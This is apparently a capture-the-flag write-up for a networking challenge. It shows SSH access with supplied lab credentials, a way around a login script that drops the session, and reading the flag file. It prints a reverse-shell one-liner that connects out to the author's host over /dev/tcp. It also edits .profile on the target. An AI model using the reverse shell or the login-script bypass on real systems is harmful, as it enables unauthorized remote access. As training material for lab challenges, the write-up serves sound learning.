SHX2 : net100-get_out

The hardest was to get credentials, but now we can not make use of them.
user: kevin
password: k3vin@pass
To start your challenge environment, please click on the right button (it starts a new docker session and displays ip:port)


Some fingerprints..

  • nmap -p32772 returns 32772/tcp open sometimes-rpc7

  • nc 32772 returns SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1

SSH for sure..

intrd@inix:~$ ssh -p 32772  
[]:32772,[]:32772 (ECDSA) to the list of known hosts.'s password:  
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-59-generic x86_64)  
 * Documentation:
 * Management:
 * Support:
Last login: Fri Jan 27 00:31:44 2017 from  
Connection to closed.  

It drops the session after connect.. clearly some scripts are running after/inside .bashrc.

If this is true, we can still send any command because i know the SSH process commands before .bashrc are loaded.

After some commands, ssh -p 32772 "cat .th3_fl4g.file" returns the flag.

Flag: shellter{CENSORED}

Easy, no?

Remote shell and fixing the connection drop 4 fun

Spawned a remote shell w/ ssh -p 32772 "/bin/sh </dev/tcp/myip/port >&0 2>&0" and fixed the connection drop, by removing last line exit from .profile which is loaded by .bashrc.

head -n -1 .profile > profile.txt ; mv profile.txt .profile to remove the last line of .profile.

All done.
Docker environment closed.

SHX2 final score..